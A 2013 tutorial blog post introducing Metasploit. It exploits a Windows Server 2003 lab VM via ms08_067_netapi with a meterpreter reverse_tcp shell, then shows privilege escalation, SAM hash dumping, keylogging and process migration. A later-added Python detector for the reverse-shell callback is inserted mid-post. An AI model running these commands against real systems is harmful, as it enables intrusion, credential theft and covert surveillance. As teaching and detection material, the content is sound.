Saturday, 26 January 2013

Intro to Metasploit: Attacking Windows Server 2003

Hey guys,

Today's tutorial is going to focus on using Metasploit to compromise a remote system and gain administrative access. This tutorial will be fairly brief and to the point and is meant to be an intro to Metasploit; I'll be following it up with some more thorough tutorials that dive into more detailed use of Metasploit and all of its functionality.

What you will need for this tutorial:

    Metasploit (Download: http://www.metasploit.com/download/)
    A target OS (I'm using a VM running Windows Server 2003, and I advise using the same for this tutorial, as this particular exploit may not work on some other operating systems. In setting up the virtual machine you may need to change the network settings to run in bridged mode; NAT may cause issues in getting the exploit to work)

Once you have Metasploit downloaded and installed, the first thing you should do is update it to make sure everything's up to date. On a Unix-based OS you can do this by opening a terminal and entering the following command:

    sudo msfupdate

be patient, as this may take a few minutes to complete. Once it is finished we can load up Metasploit using this command:

    sudo msfconsole

this can take anywhere from a few seconds up to a minute or two, so be patient. Once it loads you should be presented with a screen similar to the following:

(Note: Metasploit has a number of banners that it randomly selects at load, so it might not look exactly like this; don't fret, as long as you see the msf > prompt you're fine.)

Metasploit is an awesome tool with a large set of features to help you get information on exploits, auxiliary modules, etc. Command line programs can be intimidating at first glance, but once we take a look at some of these features you should feel a lot more comfortable using this interface. For a list of commands type the word help and press enter; this provides us with a complete set of commands and a brief description of their purpose. Another great feature of Metasploit is tab completion. That is to say, if you are unsure of an exact command or path you can type the first part of it and hit tab twice, and Metasploit will then generate a list of all the valid endings. I may be wording this poorly, so let's take a look at an example for clarity. The exploit we will be using for this exercise is ms08_067_netapi; the path for it is exploit/windows/smb/ms08_067_netapi, but say we only remember it's in exploit/windows/smb. We can type:

    use exploit/windows/smb/ms0

followed by tabbing twice, and we receive the following list of options, in which we see our exploit ms08_067_netapi:

I want to take a step back and briefly explain the command: use exploit/windows/smb/ms08_067_netapi

What we're doing here is selecting a specific exploit that we want to use. Once we have entered this command our prompt will change to:

msf exploit(ms08_067_netapi) >

and all further commands we enter will pertain to arming that exploit with a payload and determining its source and destination. A useful command at this point is the info command; by entering info we can view some of the options available, which operating systems the exploit will work on, and a brief writeup on the exploit itself:

Also useful is the 'show options' (without the apostrophes) command, which allows you to view a complete set of options that can be set for the exploit. If we enter show options we can see the following options, some of which are already pre-set with defaults:

RHOST
RPORT
SMBPIPE

EXITFUNC
LHOST
LPORT

which all come with a brief description of their purpose. The two we want to set are the RHOST and LHOST values; these are the IP addresses of our target and of our own machine respectively. To set these values we enter these commands (your IP addresses may be different):

set RHOST 192.168.1.118
set LHOST 192.168.1.147

but we're not finished yet. So far we've found an exploit and we've set our target and local addresses, but we still need a payload. If you're confused about what exactly the difference between an exploit and a payload is: an exploit takes advantage of a vulnerability in an application, and the presence of this vulnerability allows for some type of unauthorized access. In many cases this is a buffer overflow in which foreign shellcode can be pushed onto the stack and executed; the exploit is like a door, it allows passage in, and the payload is the shellcode that is being pushed onto the stack. So we can think of the exploit as our doorway in and the payload as the battering ram we use to knock that door down.

We have several options available to us, and again we can tab-complete to get a complete set, but in this tutorial we will be using Meterpreter as our payload, specifically the reverse_tcp variant. Meterpreter is an awesome tool that comes with Metasploit and provides a custom terminal interface on the targeted system; it has a number of advanced options that allow you to escalate privileges and gain SYSTEM-level access with a few simple commands. To set our payload we enter the following command:

set PAYLOAD windows/meterpreter/reverse_tcp


Now we're ready to roll. We can begin by typing the following command:

exploit

Now it will go through a quick process of running the exploit, and if all goes well you should be presented with a

meterpreter >


prompt. If you type help you will receive a list of commands you can use from within the Meterpreter shell; I suggest briefly looking through them before continuing.
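Flipping to the defender's side for a moment: the exploit above goes in over SMB (TCP/445) from LHOST to RHOST, and the reverse_tcp payload then makes the target connect back to LHOST on LPORT (Metasploit's default is 4444, but it is configurable). The Python detector below is an added example, not part of the original post; it walks a constructed connection log and flags any server that accepted an SMB connection from a peer and then opened a new, non-SMB connection back to that same peer within a minute. The log format, the one-minute window and the sample records are my assumptions.

```python
"""Flag a server that accepted SMB and then dialled its SMB client back.

Added example, not from the original post. ms08_067_netapi goes in over SMB
(TCP/445) from LHOST to RHOST; meterpreter/reverse_tcp then makes RHOST connect
back to LHOST on LPORT (default 4444, but configurable, so no port is matched).
Log format, time window and the flow records below are constructed.
"""
from datetime import datetime, timedelta

# Constructed flow log, one connection per line: time src sport dst dport.
# 192.168.1.118 is the tutorial's RHOST (target), 192.168.1.147 its LHOST.
SAMPLE_FLOWS = """\
2013-01-26T10:00:01 192.168.1.147 51122 192.168.1.118 445
2013-01-26T10:00:03 192.168.1.118 1039 192.168.1.147 4444
2013-01-26T10:05:00 192.168.1.50 51200 192.168.1.118 445
2013-01-26T10:05:30 192.168.1.118 1041 192.168.1.147 445
"""

SMB_PORT = 445
WINDOW = timedelta(seconds=60)  # assumption: callback follows within a minute

def parse_flows(text):
    """Parse the constructed flow format into (time, src, sport, dst, dport)."""
    flows = []
    for line in text.splitlines():
        ts, src, sport, dst, dport = line.split()
        flows.append((datetime.fromisoformat(ts), src, int(sport), dst, int(dport)))
    return flows

def find_callbacks(flows, window=WINDOW):
    """Return (server, peer, callback_port) for every server that accepted SMB
    from a peer and then connected back to that peer on a non-SMB port within
    `window`. SMB traffic in either direction is never itself reported."""
    last_smb = {}  # (server, peer) -> time of most recent inbound SMB from peer
    hits = []
    for ts, src, sport, dst, dport in sorted(flows):
        if dport == SMB_PORT:
            last_smb[(dst, src)] = ts
            continue
        seen = last_smb.get((src, dst))
        if seen is not None and ts - seen <= window:
            hits.append((src, dst, dport))
    return hits

if __name__ == "__main__":
    for server, peer, port in find_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(f"possible reverse-shell callback: {server} -> {peer}:{port}")
```

On the sample data only the 4444 callback from the target to the attacking machine is reported; the later SMB connection from the server to the same peer, and the unrelated client on 192.168.1.50, are not.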

Now that we have access to the target system it's time to gather some information about the system we've compromised. If we enter

sysinfo

we can get detailed information on the operating system and service pack.

getprivs
getsystem


with these two commands we can view our current privileges and attempt to elevate to SYSTEM.

hashdump


will dump the SAM password database, providing you with the password hashes of the system's users.

keyscan_start
keyscan_stop
keyscan_dump

start, stop and dump the output of a keylogger on the target.

There are a number of other cool and awesome tools, which is why I highly recommend taking a look through some of the features on your own and playing around a little bit with things. Meterpreter runs by injecting itself into a process running on the system; sometimes, if that application is closed by a legitimate user on the system, it can prematurely end our access to the system, but fear not! There is another tool available to allow you to change which process you're in and migrate into a process that's not likely to be closed (you know... like explorer.exe). To view a list of the processes currently running, type

ps

it will provide you with a list of processes similar to what you'd see if you opened Task Manager on a Windows system. From here we want to look in the PID column and get the PID of the process we want to migrate to; from there we simply need to type:

migrate PID

(in my case this was 1300). Now we can double check which process we are currently in by typing

getpid

if the numbers match up you're golden!

So at this point we have gained access to the system, elevated our privileges and gained SYSTEM access. PWNing of the box is complete and you can begin doing whatever you feel like. Sometimes, though, you may find that Meterpreter doesn't have an exact match for a command you're used to using in a command line; if this is the case you can type

shell

and drop right into a native OS shell. To go back to Meterpreter simply type

exit

If you have a series of systems you want to compromise at the same time you can background a Meterpreter session, return to the Metasploit console, and go back into that session at any time. From the Meterpreter shell type:

background

then type

sessions

to view active sessions. Note the id # of the session you would like to enter back into and type

sessions -i #

(where # is the ID of the session)

You can also choose to go directly into an OS shell instead of a Meterpreter one by using the payload windows/shell/reverse_tcp.

As I said at the beginning, this wasn't aimed at being a very comprehensive tutorial but rather at getting people familiar with the basic functions of Metasploit and making it a little more accessible to people who haven't had a chance to really dig deep enough into it. I'll be following this up with some examples of using Metasploit on UNIX systems as well as diving into some other features like using a custom payload. Hope you all enjoyed it, until next time folks!

2 comments:

  1. Awesome tutorial man, learned a few tricks from it for sure. Thanks! Looking forward to more.
  2. Heya man, this stuff is amazing! Keep it up! Looking forward to the web penetration part of your blog. Seriously, keep doing what you are doing, it really helps!